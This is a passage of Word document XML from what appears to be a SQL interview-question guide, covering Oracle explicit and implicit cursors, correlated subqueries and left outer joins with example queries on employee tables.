          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673C27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etch</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the data from the cursor (row-by-row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F90C3D"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ose</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A57851E"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262775B">
          <v:rect id="_x0000_i3264" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9AC95C"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w:t>
      </w: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 (Oracle PL/SQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B92D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75ACC8F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7D3C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loyee_id, employee_name FROM employee WHERE department = 'Finance';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417342F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id   employee.employee_id%TYPE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDDE6B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name employee.employee_name%TYPE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E9A5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271572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612A584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LOOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30896A1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emp_id, v_emp_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B7ED7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51CCFE9" w14:textId="77777777" w:rsidR="008B7C75" w:rsidRPr="005C1C9E" w:rsidRDefault="008B7C75" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D60D88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Process each row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475FF72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emp_id || ', Name: ' || v_emp_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4798946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43818D4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C15CB89"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4B2E327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689B533">
          <v:rect id="_x0000_i3265" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651F390"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50F9C55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row-by-row is slower than set-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19144EE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Consumes more memory and resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DE8E5C" w14:textId="7F7F5B3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3266" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764C78F" w14:textId="519F2235" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="008B7C75">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="792" w:name="_Toc197868006"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00356F93" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between implicit cursor and explicit cursor</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="792"/>
    </w:p>
    <w:p w14:paraId="5C19C3B1" w14:textId="6EB31B9F"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a concise comparison between </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>implicit cursor</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explicit cursor</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803"/>
        <w:gridCol w:w="3814"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="100AA74A" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="637551B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26CDA3D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mplicit Cursor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A13435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icit Cursor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="1B4E9B10" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03C07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09A539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Oracle for DML operations (INSERT, UPDATE, DELETE, SELECT INTO)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="228D2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fined by the programmer for queries returning multiple rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3559BB2F" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="319F7C4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trol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E702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t under user control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A281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ull control (open, fetch, close)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="658BEBF1" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E6ED8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ation Required?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D79A1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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E36C0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es</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="644853C1" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43E77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st Used For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21CC73B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ingle-row operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B8123D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ultiple-row operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="1135F529" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45C207D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cess via Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FB40F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e.g., SQL%ROWCOUNT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D23B3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on cursor name)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="3F3FB905" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E0AF3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 Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652A362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alary INTO v_salary FROM employees WHERE emp_id = 101;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F6D4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erate over employees in Finance department</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AA9C2AC" w14:textId="77777777" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9DE9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p w14:paraId="1E0FA8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9B764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employee SET salary = salary + 1000 WHERE department = 'HR';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9502D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Rows updated: ' || SQL%ROWCOUNT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99D5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EA09E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p w14:paraId="72DDA5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3C18B0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 SELECT emp_id, emp_name FROM employee WHERE department = 'HR';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3290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id employee.emp_id%TYPE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EC472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name employee.emp_name%TYPE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237266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76E56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5AA3919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50152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id, v_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3B4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458BB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id || ', Name: ' || v_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1480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3C884C8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3ED6D07"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END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E30BFE" w14:textId="2DF40F6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3267" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCEE4F0" w14:textId="29A58C44" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="793" w:name="_Toc197868007"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a correlated subquery</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="793"/>
    </w:p>
    <w:p w14:paraId="4E6EB14A" w14:textId="60C9B28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rrelated subquery</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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5DBA4C3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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subquery</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to columns from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>outer query</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BFFA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subquery is evaluated </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>for each row</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the outer query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5C742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subquery can return a single value or a set of values, but it's evaluated repeatedly for every row of the outer query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E1C48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5B3C60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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3658A8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outer_table outer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02422F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outer.column1 = (SELECT inner.column1 FROM inner_table inner WHERE inner.column2 = outer.column2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013A3D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C817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we have two tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB4D11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p w14:paraId="5FC5E01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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45333E9B"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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F58F22"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alary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C80E87D"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3863D4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p w14:paraId="68E6E089"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7C40C67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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B26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find the employees whose salary is greater than the average salary of their respective department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E19F5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rrelated Subquery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AA20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name, salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB53B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0CC90F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salary &gt; (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18665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AVG(salary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28605E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140740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e.department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754415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000470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5B1551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outer query selects employees from the Employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F196D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calculates the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>average salary</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each department (e.department_id).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8E93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is </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>correlated</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it references e.department_id from the outer query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE48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 in the outer query, the inner query is executed to get the average salary for that employee’s department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFAF6F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dvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E19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ynamic comparisons</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows dynamic comparisons based on the outer query's values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A68C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lexible</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Useful for row-by-row evaluations and comparisons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD574D9" w14:textId="32DD7D2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3268" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1607A82E" w14:textId="68A6C00E" w:rsidR="00380657" w:rsidRPr="00CE4B95" w:rsidRDefault="00356F93">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="794" w:name="_Toc197868008"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the left outer join</w:t>
      </w:r>
      <w:r w:rsidR="00380657" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="794"/>
    </w:p>
    <w:p w14:paraId="45024E31" w14:textId="23162424" w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w:rsidRDefault="00BD197A"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often just referred to as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is a type of SQL join that returns all records from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>left table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the first table listed in the query) and the matching records from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>right table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the second table listed in the query). If there is no match found in the right table, the result will contain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for columns from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047E7BA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035A84F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ensures that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re returned, even if there is no match in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AAF2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f there is a match, the corresponding row from the right table will be included in the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317E15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there is no match,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will be returned for the columns of the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D6C8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07AA26C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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259F6E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left_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7060D62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right_table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E04D2E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left_table.column_name = right_table.column_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C23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494D7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tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2EF12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65"/>
        <w:gridCol w:w="1094"/>
        <w:gridCol w:w="1451"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="75C93E17" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE75D9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mp_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52FEF2B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19B2A74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r>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="35285A3D" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="445FE1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D5FBF4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4D39957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r>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="045BBFD3" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="681AA5B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154F36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130A11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r>
      <w:tr w:rsidR="00BD197A" w:rsidRPr="005C1C9E" w14:paraId="750D12F0" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EDABD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389716D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175363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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="119C7A2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BD197A" w:rsidRPr="005C1C9E" w14:paraId="656052AA" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B05D7B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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3098B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420A1D7" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B5032F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0EBF83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2D1A33FC" w14:textId="77777777" w:rsidTr="00BD197A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
